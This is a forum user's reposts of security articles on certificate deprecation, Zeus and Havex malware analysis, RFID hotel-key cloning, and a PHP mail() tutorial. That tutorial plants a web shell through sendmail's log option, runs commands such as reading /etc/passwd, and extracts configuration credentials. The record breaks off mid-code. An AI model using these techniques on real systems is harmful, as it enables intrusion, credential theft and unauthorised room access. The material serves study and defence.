Everything posted by Nytro
-
The company is very large and serious, not some small back-room operation. I recommend it to those with experience.
-
[h=1]107,000 web sites no longer trusted by Mozilla[/h]Posted by jnickel in Project Sonar on Sep 4, 2014 3:48:43 PM

Mozilla's Firefox and Thunderbird recently removed 1024-bit certificate authority (CA) certificates from their trusted store. This change was announced to the various certificate authorities in May of this year and shipped with Firefox 32 on September 2nd. This change was a long time coming, as the National Institute of Standards and Technology (NIST) recommended that 1024-bit RSA keys be deprecated in 2010 and disallowed after 2013. A blog post at http://kuix.de/blog provided a list of specific certificates that would no longer be trusted starting with Firefox 32.

There is little disagreement that 1024-bit RSA keys may be cracked today by adversaries with the resources of nation states. As technology marches on, the security of 1024-bit keys will continue to deteriorate and become accessible by operators of relatively small clusters of commodity hardware. In the case of a CA key, the successful factoring of the RSA primes would allow an adversary to sign any certificate just as the CA in question would. This would allow impersonation of any "secure" web site, so long as the software you use still trusts these keys.

This is certainly a welcome change, but how many sites are going to be affected by the removal of these CA certificates, and how many of these sites have certificates that aren't due to expire anytime soon? Fortunately there is a means to answer these questions. In June of 2012, the University of Michigan began scanning the Internet and collecting SSL certificates from all sites that responded on port 443. At Rapid7, we started our own collection of certificates starting in September of 2013 as part of Project Sonar, and have been conducting weekly scans since. Both sets of scans record the entire certificate chain, including the intermediate CA keys that Mozilla recently removed from the trusted store. We loaded approximately 150 scans into a Postgres database, resulting in over 65 million unique certificates, and started crunching the data.

The first question we wanted to answer, which is how many sites are affected, was relatively easy to determine. We searched the certificate chain for each of the roughly 20 million web sites we index to check if the SHA1 hashes listed in the blog post are present in the signing chain. After several minutes Postgres listed 107,535 sites that are using a certificate signed by the soon-to-be untrusted CA certificates. That is a relatively large number of sites and represents roughly half a percent of all of the web sites in our database.

The next question we wanted to explore was how long the 1024-bit CA key signed certificates would continue to be used. This proved to be informative and presents a clearer picture of the impact. We modified the first query and grouped the sites by the certificate expiration date, rounded to the start of the month. The monthly counts of affected sites, grouped by expiration date, demonstrated the full extent of the problem. The resultant data, shown in part in the graph below, makes it clear that the problem isn't nearly as bad as the initial numbers indicated, since a great many of the certificates have already expired and the rest will do so over the next year. Surprisingly, over 13,000 web sites presented a certificate that expired in July of this year. Digging into these, we found that almost all of these had been issued to Vodafone and expired on July 1st.
These expired certificates still appear to be in use today. The graph below demonstrates that the majority of affected certificates have already expired and those that haven't expired are due to expire in the next year. We have excluded certificates from the graph that expired prior to 2013 for legibility. While Mozilla's decision will affect a few sites, most of the affected certificates have already expired, and shouldn't be trusted on that basis alone.

In summary, the removal of trust for these certificates is a sound decision based upon NIST recommendations, and while it initially appeared that a great many sites would be affected, the majority of these sites either have expired certificates or a certificate that expires within the next year. We hope that Chrome and other browsers will also remove these certificates to remove the potential risk involved with these 1024-bit CA keys.

Going forward, we are now tracking the certificates presented by SMTP, IMAP, and POP services, and will keep an eye on those as the data rolls in. If you still use a 1024-bit RSA key for any other purpose, such as Secure Shell (SSH) or PGP, it is past time to consider those obsolete and start rolling out stronger keys of at least 2048 bits, using ECC-based keys where available.

Sursa: https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla
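As a rough illustration of the chain check described above, the sketch below computes the SHA-1 fingerprint of every certificate in a saved PEM chain file and flags any match against a list of removed CA fingerprints. It is a minimal sketch, not Rapid7's actual Postgres query; the fingerprint placeholder and file name are my own assumptions and should be replaced with the values from the kuix.de post.

```python
import base64
import hashlib
import re
import sys

# Placeholder: SHA-1 fingerprints of the CA certificates removed by Mozilla
# (fill in the real values from the blog post referenced above).
REMOVED_CA_SHA1 = {
    "0000000000000000000000000000000000000000",
}

PEM_RE = re.compile(
    b"-----BEGIN CERTIFICATE-----(.+?)-----END CERTIFICATE-----", re.S
)

def chain_fingerprints(pem_bytes):
    """Yield the SHA-1 fingerprint of each certificate in a PEM chain."""
    for match in PEM_RE.finditer(pem_bytes):
        der = base64.b64decode(b"".join(match.group(1).split()))
        yield hashlib.sha1(der).hexdigest()

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:  # e.g. a chain.pem saved from a scan
        for fp in chain_fingerprints(f.read()):
            status = "REMOVED" if fp in REMOVED_CA_SHA1 else "ok"
            print(f"{fp}  {status}")
```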
-
Exploit PHP’s mail() to get remote code execution
September 3, 2014

While searching around the web for new nifty tricks I stumbled across this post about how to get remote code execution exploiting PHP’s mail() function.

Update: After some further thinking and looking into this even more, I’ve found that my statement about this only being possible in really rare cases was wrong, since this can also be exploited in other scenarios that are much more common than I first thought. So, instead of removing content, I added a strikethrough on the statements that are no longer valid, and updated with a second scenario explanation.

First, I must say that this is only going to happen under some really rare circumstances. Nevertheless, it’s really something to think about and keep an eye out for. I will explain an example scenario which I think could be a real-life scenario later in this article. So, with that said, let’s have a look at what this is all about.

When using PHP to send emails we can use PHP’s built-in function mail(). This function takes a total of five parameters:

To
Subject
Message
Headers (Optional)
Parameters (Optional)

This looks pretty innocent at first glance, but if this is used wrong it can be really bad. The parameter of interest is the 5th and last one, so let’s have a look at what the PHP manual has to say about it.

The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.

This is really interesting. In short, this says that we can alter the behavior of the sendmail application.

Update: I should have added this from the beginning, but just to make this clear: the fifth argument is disabled when PHP is running in safe mode.

mail() — In safe mode, the fifth parameter is disabled. (note: only affected since PHP 4.2.3)
Source: PHP: Functions restricted/disabled by safe mode - Manual

Now, let’s have a look at the sendmail manual. I’m not going to post the entire manual here, but I will highlight some of the interesting parts.

Some interesting parameters:

-O option=value Set option option to the specified value. This form uses long names.
-Cfile Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified.
-X logfile Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly.

Some interesting options:

QueueDirectory=queuedir Select the directory in which to queue messages.

So how can this be exploited?

Remote Code Execution

As stated above, this only occurs under very specific circumstances. For this to be exploitable, the user has to be able to control what goes into the 5th parameter, which does not make sense at all that anyone would do it. But it’s still something that really should be kept in mind by developers. With that said, let’s just dive into it!

This is the code for exploiting the mail() function:

$to = 'a@b.c';
$subject = '<?php system($_GET["cmd"]); ?>';
$message = '';
$headers = '';
$options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php';
mail($to, $subject, $message, $headers, $options);

Let’s inspect the logs from this.
First let’s have a look at what we can see in the browser by only going to the rce.php file:

11226 <<< To: a@b.c
11226 <<< Subject:
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<

Nothing really scary to see in this log. Now, let’s use the cat command in the terminal on the same file:

> cat rce.php
11226 <<< To: a@b.c
11226 <<< Subject: <?php system($_GET["cmd"]); ?>
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<

See anything a bit more interesting? Let’s try to execute some commands. I visit http://localhost/rce.php?cmd=ls%20-la and get the following output:

11226 <<< To: a@b.c
11226 <<< Subject: total 20
drwxrwxrwx 2 *** *** 4096 Sep 3 01:25 .
drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 ..
-rw-r--r-- 1 *** *** 92 Sep 3 01:12 config.php
-rwxrwxrwx 1 *** *** 206 Sep 3 01:25 mailexploit.php
-rw-r--r-- 1 www-data www-data 176 Sep 3 01:27 rce.php
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<
11226 <<<
11226 <<<
11226 <<< [EOF]

Now, let me break it down in case you don’t fully understand the code. The first four variables are pretty straightforward. We set the recipient email address to some bogus address, then in the subject we inject the PHP code that will be executing our commands on the system, followed by empty message and headers. Then the fifth variable is where the magic happens. The $options variable holds a string that will let us write our malicious code to the server and get remote code execution.

First we change the mail queue directory to /tmp using the -O argument with the QueueDirectory option. The reason why we want it there is because this is globally writable. Second, the path and filename for the log is changed to /var/www/html/rce.php using the -X argument. Keep in mind that this path will not always be the same. You will have to craft this to fit the target's file system.

If we now point our browser at http://example.com/rce.php it will display the log for the attempted delivery. But since we added the PHP code to the $subject variable, we can now add the following query: ?cmd=[some command here]. For example http://example.com/rce.php?cmd=cat%20/etc/passwd.

If you want you could also create a Local/Remote File Inclusion vulnerability as well. To do this, just change system() to include(). This can be handy if wget is not available, or you’re not able to include a remote web shell. It’s also important to know that it’s not only the subject field that can be used to inject arbitrary code. The content of all the fields, except the fifth, is written to the log.

Read files on the server

Another way to exploit this is to directly read files on the server. This can be done by using the -C argument as shown above.
I have made a dummy configuration file just to show how it works:

$to = 'a@b.c';
$subject = '';
$message = '';
$headers = '';
$options = '-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php';
mail($to, $subject, $message, $headers, $options);

This creates a file named evil.php with the following content:

11124 >>> /var/www/html/config.php: line 1: unknown configuration line "<?php"
11124 >>> /var/www/html/config.php: line 3: unknown configuration line "dbuser = 'someuser';"
11124 >>> /var/www/html/config.php: line 4: unknown configuration line "dbpass = 'somepass';"
11124 >>> /var/www/html/config.php: line 5: unknown configuration line "dbhost = 'localhost';"
11124 >>> /var/www/html/config.php: line 6: unknown configuration line "dbname = 'mydb';"
11124 >>> No local mailer defined

Now we have managed to extract very sensitive data, and there’s a lot of other things we can extract from the server.

A real-life scenario where this can become a reality

Scenario #1: Admin panel

To be honest I actually had to think about this for a while. I mean, who would be so stupid as to let their users control the sendmail parameters? Well, it really doesn’t have to be that stupid, so consider the following scenario. You have an admin panel for your website. Just like every other admin panel with respect for itself, it lets you set different settings for sending emails: stuff like port, SMTP server, etc. But not only that, this administration panel actually lets you monitor your mail logs, and you can decide where to store the logs. Suddenly the idea of the values of the 5th parameter being controlled by an end user doesn’t sound that stupid anymore. You would of course not let this be modified from the contact form. But admins wouldn’t hack their own site, would they? So in combination with other attacks that result in unauthorized access, this can become a real threat, since you can actually create vulnerabilities that were not originally in the application.

Scenario #2: Email service

The idea around this scenario spawned from the original post linked to in the beginning of the article. So, let’s consider we are running a website where a person can send an email to a recipient. In this case, the user must manually set the from address. Now, in the code we use the -f argument along with the user-supplied from address. If this from field is poorly validated and sanitized, the user can continue writing the required arguments and values directly.

How to detect a possible vulnerability

The fastest way to detect any possibility for this in code is to use Linux’s grep command, and recursively look for any use of mail() with all 5 parameters in use. Position yourself in the root of whatever project you want to check and execute the following command. This will return all code lines that use mail() with five parameters.

grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" *

There will probably be some false positives, so if you have any suggestions to improve this to make it even more accurate, please let me know!

Summary

This is not something that you will stumble across often. To be honest I don’t expect to ever see this in the wild at all, though it would be really cool to do so, but you never know, as explained in the “real-life scenario” section.
Still, I do find this to be really interesting, and it makes you think: “what other PHP functions can do this?” I hope you enjoyed the article, and if you have any comments you know what to do.

Sursa: Exploit PHP’s mail() to get remote code execution | Security Sucks
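As a rough complement to the grep one-liner above, here is a small Python sketch that walks a project tree and flags mail() calls that appear to pass a fifth argument, tolerating calls that span several lines. It is only a heuristic (a proper check would parse the PHP), and the regex and path handling are my own assumptions, not part of the original post.

```python
import os
import re
import sys

# Match mail( ... ) with at least four top-level commas -- a rough heuristic
# for a five-argument call; nested commas will cause false positives.
MAIL_CALL = re.compile(r"mail\s*\((?:[^()]*,){4}[^()]*\)", re.S)

def scan(root):
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as f:
                source = f.read()
            for match in MAIL_CALL.finditer(source):
                line = source.count("\n", 0, match.start()) + 1
                print(f"{path}:{line}: {' '.join(match.group(0).split())}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")
```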
-
Volatility 2.4 at Blackhat Arsenal - Defeating Truecrypt Disk Encryption
Nytro replied to Nytro's topic in Tutoriale video
Yes. Well, the cases where you have access to someone's memory dump are pretty rare. If you had access to that computer, you would already have access to all the files mounted with TrueCrypt. -
Thursday, September 4, 2014

Malware Using the Registry to Store a Zeus Configuration File

This blog was co-authored by Andrea Allievi. A few weeks ago I came across a sample that was reading from and writing a significant amount of data to the registry. Initially, it was thought that the file may be a binary, but after some analysis it was determined that the file is a configuration file for Zeus. Within this blog post we take a look at our analysis of the data I/O in the registry.

Initial Stages of Infection

The scope of this paper is the analysis of the registry write. This section is a brief overview of what happens when the malware is executed:

Unpacks
Creates a copy of itself in the tmp directory
Injects itself into explorer.exe
Starts a thread that executes the injected code

The code injected into Explorer.exe becomes the focus of our analysis. To get started, an infinite loop was added to the entry point of the injected code and OllyDbg was used to attach to Explorer.exe. Debugging injected code in this manner was previously covered here.

Analysis

After attaching the debugger and prior to continuing execution, a breakpoint is set on Advapi32.RegSetValueExW() before the large data write is made. This breakpoint is tripped multiple times by multiple threads within Explorer.exe. Most of the time the threads are related to the injected ZBot code. It turns out that the same thread is used consistently for writing to this registry key. Several sub-keys are created to store data that the application uses at a later time. The names of the sub-keys are created using an index value that is combined with other data to appear random. For instance, the key “2f0e9h99” was created by combining a hash of the User SID with the index value 0x9A. Throughout this paper, the registry key will be referenced by either name or index.

A Series of Registry Writes

This section establishes a pattern to the registry activity that can be used to help figure out what the malware is accomplishing with the registry I/O. The registry activity centers around writing to the following key: HKUSERS\<sid>\Software\Microsoft\Ujquuvs. The “ujquuvs” is dynamically generated by the application and will change between executions.

[Figure: Ujquuvs registry key prior to the first write]

Prior to the first registry write of interest the Ujquuvs sub-key contains the values shown in the above graphic. Throughout this section we’ll see that new value names are generated and data is cycled between the keys. One of the first chunks written to the registry value 2f0e9h99 is a binary string that is 475 bytes in length. The following graphic shows the call to the Windows Advapi32.RegSetValueExW() procedure made by the malware.

[Figure: RegSetValueExW() stack]

[Figure: First registry write to 2f0e9h99]

The above graphic displays the binary string data that was written to the registry. Although 475 bytes is a significant chunk of data written to the registry, it is not what caused an alarm. The registry write I am looking for is greater than 3000 bytes.
[Figure: Second registry write to 2f0e9h99]

Another 475 byte write occurs, but the data is different than the first write. It is worth noting that although the data is different, the first four bytes appear to be the same “5D BB 95 50” pattern. This may be a header used to distinguish the data. The next call to RegSetValueExW() will write 3800 bytes to the registry. The binary data was replaced with alphanumeric data (possibly base64). Another assumption can be made: the original binary data is encoded and then stored back to the registry.

[Figure: Alphanumeric data written to 2f0e9h99]

This is one of the large data writes that was flagged by the sandbox. Continuing on we see several more data writes, all of which are variations of the above. The data cycles between binary strings and alphanumeric strings, and the string lengths vary. One of the largest data writes was a 7200 byte alphanumeric string.

Registry Reads

Along with the registry writes there are usually corresponding registry reads. The data located in 2f0e9h99 is pulled into a buffer and manipulated by the application. Once the data is read, it is decoded from alphanumeric encoding into a long list of 475 byte chunks of binary data. These chunks of data contain a hash to identify specific chunks within the list. Whenever a new chunk of data is received, the data contained in 2f0e9h99 is decoded and the hash value of the received chunk of data is compared against each chunk that exists already within the registry. If these hash values match, then that registry data chunk is replaced with the incoming data. Otherwise the data is appended to the bottom of the list. Once the input queue is empty the calls to read or write to the registry stop. The thread has not been killed, but it is (most likely) suspended until some event occurs. The next section combines these findings with further analysis to track down the source of the registry writes.

ZBotThread_1 Procedure

Walking through the executable with a debugger led us to the source of the registry writes. A thread is created and starts executing the code at address 0x41F579. From here on out this code is going to be referred to as ZBotThread_1(). This procedure is the backbone for all activity related to this registry key.

[Figure: Network socket loop]

After several instructions for initializing various data structures, ZBotThread_1() initializes a network socket to communicate with a remote server. Once traffic is received, the IP address is verified against an IP blacklist of network address ranges that exists within a data structure used throughout the application. These IP address ranges appear to be owned by various AV vendors (indicated here).
Here is the list of blacklisted address ranges with the corresponding netmasks:

64.88.164.160 255.255.255.224
64.233.160.0 255.255.224.0
65.52.0.0 255.252.0.0
66.148.64.0 255.255.192.0
84.74.14.0 255.255.255.0
91.103.64.0 255.255.252.0
91.200.104.0 255.255.255.0
91.212.143.0 255.255.255.0
91.212.136.0 255.255.255.0
116.222.85.0 255.255.252.0
128.130.0.0 255.254.0.0
131.107.0.0 255.255.0.0
150.26.0.0 255.255.255.0
193.71.68.0 255.255.255.0
193.175.86.0 255.255.255.0
194.94.127.0 255.255.255.0
195.74.76.0 255.255.255.0
195.164.0.0 255.255.0.0
195.168.53.48 255.255.0.0
195.169.125.0 255.255.255.0
204.8.152.0 255.255.248.0
207.46.130.0 255.255.0.0
208.118.60.0 255.255.240.0
212.5.80.0 255.255.255.192
212.67.88.64 255.255.224.0

Once the IP address is verified, the payload is decrypted and the data is initialized into the following data structure (sub_41F9C6):

[Figure: ZBOT_SOCKET_DATA structure]

Throughout this post we will refer to this as ZBOT_SOCKET_DATA. Each datagram payload contains this data structure. The lpDataBuff points to a buffer that contains the data that will eventually be written to the registry. In addition, the dataBuffHeader[0x2C] contains the first 44 bytes of the decrypted received data. These bytes contain critical information about the entire data chunk.

After a few checks to verify the integrity of the data, ZBotThread_1 calls AnalyseSockDataAndUpdateZBot (sub_43D305). This function takes the 20 byte hash of the data contained within the data chunk header (first 44 bytes) and compares it against a list of other hashes. This list of hashes is built out of previously received datagrams. If the hash is part of the list then the data is dropped. Otherwise, the hash is appended to the end of the list.

Next, AnalyseAndFinalizeSockData (sub_41D006) is called to begin the process of adding the data to the registry. Once inside the function, the data type (dataBuffHeader+0x3) is checked. There are several different data types, but the one that is relevant for the purposes of this blog post is type 0x6. This signifies the end of the data stream and the malware can proceed to save the data to registry key 2f0e9h99.

The type 0x6 code branch calls VerifyFinalSckDataAndWriteToReg (sub_436889). This function strips the 0x2C length header from the socket data before verifying the integrity using RSA1. Finally, if the data integrity is good, the WriteSckDataToReg function is called.

Writing Socket Data to the Registry

The previously received socket data has already been written to registry key 2f0e9h99. At this point, the socket data needs to be merged with the data contained within the registry key. Before this can occur, the registry data, which is currently alphanumerically encoded (see the registry write section above), must be decoded. The decoded data is a series of 0x1D0 hex byte chunks. Each chunk is a ZBOT_SOCKET_DATA structure.

[Figure: Alphanumeric encoded data in memory]

The hash of the socket data is compared against the hash of each chunk contained within the list of chunks. If the hashes match, then that registry data chunk is replaced with the network socket data. Otherwise the network socket data is appended to the end of the list.
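To make the merge logic concrete, here is a small Python sketch of the replace-or-append behaviour just described: incoming chunks are matched against stored chunks by the hash carried in their header. The chunk layout (a 0x2C-byte header containing a 20-byte hash, 0x1D0 bytes per chunk) follows the description in the post, but the exact hash offset inside the header is my assumption for illustration.

```python
CHUNK_SIZE = 0x1D0   # size of one ZBOT_SOCKET_DATA chunk, per the post
HEADER_SIZE = 0x2C   # header length stripped before the integrity check
HASH_OFFSET = 0x04   # assumed offset of the 20-byte hash inside the header
HASH_SIZE = 20

def chunk_hash(chunk: bytes) -> bytes:
    """Return the identifying hash carried inside a chunk's header."""
    return chunk[HASH_OFFSET:HASH_OFFSET + HASH_SIZE]

def merge_chunk(stored: list[bytes], incoming: bytes) -> None:
    """Replace the stored chunk with the same hash, or append the new one."""
    incoming_hash = chunk_hash(incoming)
    for i, existing in enumerate(stored):
        if chunk_hash(existing) == incoming_hash:
            stored[i] = incoming          # same hash: replace in place
            return
    stored.append(incoming)               # unseen hash: append to the list

def split_chunks(blob: bytes) -> list[bytes]:
    """Split a decoded registry value into fixed-size chunks."""
    return [blob[i:i + CHUNK_SIZE] for i in range(0, len(blob), CHUNK_SIZE)]
```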
Once the update is completed the registry data is (once again) alphanumerically encoded and written back to the 2f0e9h99 registry key. It’s worth noting that our sample dropper can encode the original data in several different ways: Base64, and 3 customized XOR algorithms (see the function at VA 0x4339DE for all the details).

Summary

Using the registry as a way to store and update a configuration is a clever idea. The multiple writes and reads that come with constructing the file with a registry key will raise alarms; it’s what originally grabbed our interest. This blog post covers a small percentage of the functionality of this malware sample. Some of the functionality that we uncovered denotes a high level of sophistication by the author. We strongly encourage others to download a copy and crack open their debuggers.

Sample MD5 Hashes:
Dropper: DA91B56D5A85CAADDB00908220D62B92
Injected Code: B4A00F4C6F025C0BC12DE890A2C1742E

Written by Shaun Hurley at 1:00 PM

Sursa: VRT: Malware Using the Registry to Store a Zeus Configuration File
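As a side note, the AV-vendor blacklist shown earlier is easy to reproduce for your own triage. The sketch below uses Python's ipaddress module to test whether a given address falls inside any of the listed ranges; only a few of the ranges are included here as examples, the rest can be copied from the list above.

```python
import ipaddress

# A few of the blacklisted ranges from the post, as (network, netmask) pairs.
BLACKLIST = [
    ("64.88.164.160", "255.255.255.224"),
    ("65.52.0.0", "255.252.0.0"),
    ("131.107.0.0", "255.255.0.0"),
    ("207.46.130.0", "255.255.0.0"),
]

NETWORKS = [
    ipaddress.ip_network(f"{net}/{mask}", strict=False)
    for net, mask in BLACKLIST
]

def is_blacklisted(address: str) -> bool:
    """Return True if the address falls inside any blacklisted range."""
    ip = ipaddress.ip_address(address)
    return any(ip in network for network in NETWORKS)

if __name__ == "__main__":
    for candidate in ("131.107.1.1", "8.8.8.8"):
        print(candidate, is_blacklisted(candidate))
```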
-
RFID, when the manufacturer matters

Nowadays we can find RFID technology almost everywhere: in supermarkets (anti-theft), in assembly lines (identify & track items), in highways (tolls), in public transportation, in your passport and your credit card, and it is also used by many companies and by hotels for access management. This post is about the latter.

Indeed, during my trips, should it be for business or for holidays, I have stayed in many hotels. Some of them were still using good old keys like you do at home, most of them still use magnetic cards, and some were relying on RFID cards to give you access to your room. Unfortunately, the security level of such RFID access management highly depends on the manufacturer, as we will see.

First, let’s begin with the tools I use. I started messing with RFID more than a year ago and today, I mostly rely on two tools:

A proxmark3, which is a really awesome tool, able to deal with low frequency tags (120-135 kHz) and high frequency tags (13.56 MHz), but it’s pretty expensive, you have to handle external antennas and it relies on a dedicated client
An OpenPCD 2, which only deals with a limited amount of high frequency tags but it’s opensource, credit card sized, and natively supported with libnfc and related tools

So, basically, proxmark3 is useful when you are at home or at the office and it is mandatory for specific RFID technologies, but usually, when I travel, I try to keep my hand-luggage as light as possible. That’s why I mostly rely on my Android tablet and why I avoid carrying specific cables (proxmark uses one of those between the main PCB and the antenna). To still be able to mess with RFID/NFC technologies I might encounter while travelling, I cross-compiled a recent version of libnfc and mfoc to easily crack Mifare Classic keys. There is also a tool called mfcuk but unfortunately this one has never worked so far… It only displays timing errors and never finishes. By googling, I don’t seem to be the only one encountering issues with it…

I won’t go into details about all kinds of RFID tags that you might encounter, but I am going to detail some of the NXP tags inside their Mifare family, which still seem to be the most popular ones for 13.56 MHz tags:

Mifare Ultralight (64 bytes memory divided into 16 pages of 4 bytes, almost no protection)
Mifare Classic (1KB or 4KB memory, divided into blocks, with r/w protection relying on two 6-byte keys and a custom cryptography algorithm called Crypto1 which is broken)
Mifare Plus (2KB or 4KB memory, adds AES-128 cipher to the Mifare Classic tag)
Mifare DESfire (2KB, 4KB or 8KB and uses DES cipher)

All those cards have a read-only area at the beginning of the memory that has been set by the manufacturer. More details about NXP Mifare family here.

OK, enough “theory” for now. So far, I encountered two manufacturers of RFID key systems dedicated to hotels:

VingCard Elsafe, a Norwegian company
Kaba Ilco, a Swiss or German company

VingCard seems to be quite an old player in hotel locks as I have already seen cards like those: They might ring a bell for those of my readers who began working with computers when punch cards were the only way to interface with a computer ;-) But let’s go back to recent wireless technologies.

As far as I can tell, VingCard uses Mifare Ultralight tags for their locks. If you have read the last paragraphs carefully, you may remember that this particular kind of token lacks security measures: anybody can freely read the content (64 bytes of data).
On the other side, Kaba is using Mifare Classic 1K cards for the customer’s keys and Mifare Classic 4K for manager’s keys (sort of a master key, required to program customer’s keys). At least, on those, we found a bit of security. Unfortunately, Crypto1, NXP’s cipher algorithm, is broken and you can recover all the keys in a matter of minutes (or sometimes only a few seconds) with the tools I mentioned (mfoc / mfcuk or proxmark3).

My first goal to understand how those keys work was to dump them, several times, entering the room between dumping attempts just to check if a counter is stored in them. At least, I expect to find, maybe encoded in a weird way:

the room number
the start date of my stay
the duration of the stay

Also, to get extra dumps, I went back to the reception desk, asking them to program my key again because it was not working anymore, or even asking them for a new key because I seemed to have lost the first one (of course, I have given back both keys at checkout to avoid extra charges). Another thing to try when you have friends or family in the same hotel is to dump their keys too, especially if they are in the rooms next to yours (or at least on the same floor in case the floor is also encoded in the card). This way I was able to bindiff the dumps and try to find useful stuff.

Let’s begin with VingCard. Here is the result while running vbindiff against two different keys encoded for the same room: That’s a lot of red! The first few bytes have to be different because they hold the “unique ID” of the tag. But if we take a closer look at those dumps, we can see a pattern: one byte is repeated a lot on each dump in the red part. This value might be used to XOR the useful content. And the 4 final bytes might be a checksum value. Note also the constant 0x21 value across those dumps at offset 0x13. Surprisingly, it matches the length of the big red block…

Let’s try vbindiff again after XORing the 33-byte red memory block… That’s definitely better! But we will have to find out later how this byte is computed… The next assumption we can make is for the three bytes located at 0x1F-0x21: at this particular hotel, I was given two room keys at once. So it might be the “key number” or something related.

The next step is to compare keys encoded for two different rooms within the same hotel (after XORing their respective blocks of course): Bingo! We still have the same differences we have seen. Apart from that, only two bytes have changed between those cards. Those have to be the room number (or at least some sort of lock ID number). Also, if you look carefully at the last two screenshots, you may notice that the byte at offset 0x1F only has 2 possible values so far: 0x42 or 0x82.

As it was a short stay (1 night), I wasn’t able to go deeper on those (trying to figure out the duration encoding and things like that). But remember, we still have to find how the XOR key is computed and what kind of checksum is used. Well, for that part, I may disappoint you, but no luck so far. If any of my readers has a clue, please leave it in the comments and I will test it against all the dumps I have.

At the beginning I was talking about comparing the badly designed VingCard RFID system against Kaba Ilco’s one.
Long story short, by applying the exact same method, I can tell you that this one seems pretty good on several points:

Mifare Classic keys (A and B) seem to be derived from the UID of the tag, but despite a whole bunch of dumps, I wasn’t able to find an obvious algorithm
While bindiff-ing two dumps, I always ended up with two completely different 16-byte blocks, even after having my key reprogrammed. Marketing brochures state that they use cryptography, so my guess would be that this is an encrypted block, depending on the Mifare Classic 4K tag (the Manager key) that has been used to program it. Moreover, the brochure also states that the cipher key is renewed every 30 days.

Going further on Kaba Ilco’s system would require using the proxmark3 for passively sniffing RFID exchanges between the tag and the lock. As a conclusion, we can say that every manufacturer states that his system is secure, but one should really ensure that it actually is, either by auditing the system himself or by relying on a third-party actor that can do that.

by Jean-Michel Picod

Sursa: A little bit of everything • RFID, when the manufacturer matters...
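To illustrate the XOR-and-diff approach described in the VingCard section, here is a small Python sketch: it guesses the XOR key as the most frequent byte in the variable region, un-XORs the 0x21-byte block, and prints the offsets that still differ between two dumps. The block start offset and length are my reading of the post (the 0x21 value found at offset 0x13), not confirmed values, and the dump file names are placeholders.

```python
from collections import Counter

BLOCK_START = 0x14   # assumed start of the XORed region, right after offset 0x13
BLOCK_LEN = 0x21     # 33 bytes, matching the constant found at offset 0x13

def guess_xor_key(dump: bytes) -> int:
    """Guess the XOR key as the most frequent byte in the variable region."""
    region = dump[BLOCK_START:BLOCK_START + BLOCK_LEN]
    return Counter(region).most_common(1)[0][0]

def unxor_block(dump: bytes) -> bytes:
    key = guess_xor_key(dump)
    block = dump[BLOCK_START:BLOCK_START + BLOCK_LEN]
    return bytes(b ^ key for b in block)

def diff_offsets(a: bytes, b: bytes) -> list[int]:
    """Offsets (within the block) where the two decoded dumps differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]

if __name__ == "__main__":
    dump1 = open("room_key1.mfd", "rb").read()   # 64-byte Ultralight dumps
    dump2 = open("room_key2.mfd", "rb").read()
    print(diff_offsets(unxor_block(dump1), unxor_block(dump2)))
```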
-
[h=3]Volatility 2.4 at Blackhat Arsenal - Defeating Truecrypt Disk Encryption[/h]This video shows how to use Volatility’s new Truecrypt plugins to defeat disk encryption on suspect computers running 64-bit Windows 8 and server 2012. The video is narrated by Apple's text to speech and you can find the actual text on the Youtube page. The live/in-person demo was given at the @Toolswatch Blackhat Arsenal. Posted by Michael Hale Ligh at 10:08 AM Sursa: Volatility Labs: Volatility 2.4 at Blackhat Arsenal - Defeating Truecrypt Disk Encryption
-
Analysis of Havex
Published on 2014-09-03 13:00:00.

Tools

IDA 6.6 demo
PE.explorer

Static analysis

Havex is a well-known RAT. Recently a new plugin appeared, and it targets ICS/SCADA systems. We found many different samples. Let’s start by looking at one.

MD5sum: 6bfc42f7cb1364ef0bfd749776ac6d38
SHA1sum: db8ed2922ba5f81a4d25edb7331ea8c0f0f349ae

All files are just simple Windows 32-bit DLLs, with no obfuscation, not packed. Nothing creepy! Take a look at the import table. It uses basic anti-debugging tricks (IsDebuggerPresent, GetTickCount…), and no Winsock APIs are called. The most interesting part is the import table from MPR.dll. According to the MSDN, the WNet* functions are used to enumerate network resources and connections.

If we look at the Unicode strings, we clearly see something interesting. Looking at the string’s references, we find a function that scans the LAN network. Just after scanning the network, there is another function that calls the WNetEnum* API functions we have seen previously in the import table. And it calls WriteLogs, as I named it. It writes what it finds into a log file in the %TEMP% directory.

After scanning the LAN, more interesting things happen. It is going to scan for OPC servers. But how can this be done? Look at the sub_100019E7 function: it starts by creating a thread. It launches COM API functions. The parameter Unk_10030C70 has the value 9DD0B56C-AD9E-43EE-8305-487F3188BF7A. It is used to get a list of servers (IID_IOPCServerList2). Clsid 6C0B50D-09D9-E0AD-0EE4-3835487F31880BF7A is used to retrieve the COM class factory for the component (CLSID_OPCServerList). It searches OPC Tags. All it finds is written to a file, and sent to the C&C by the RAT.

Conclusion: This Havex plugin is not difficult to analyse and understand. It does not attack, but it is clearly designed to spy on industrial networks.

References:
MSDN: WNetOpenEnum WNetEnumRessource CoInitializeEx CoCreateInstanceEx
Article: F-secure

Sursa: https://www.malware.lu/articles/2014/09/03/analysis-of-havex.html
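For readers who want to triage similar samples themselves, a quick way to reproduce the import-table observation above is to dump the imports with the pefile Python library and flag any WNet* entries coming from MPR.dll. This is a generic triage sketch under my own assumptions, not a tool used in the original write-up.

```python
import sys
import pefile  # third-party: pip install pefile

def dump_imports(path):
    pe = pefile.PE(path)
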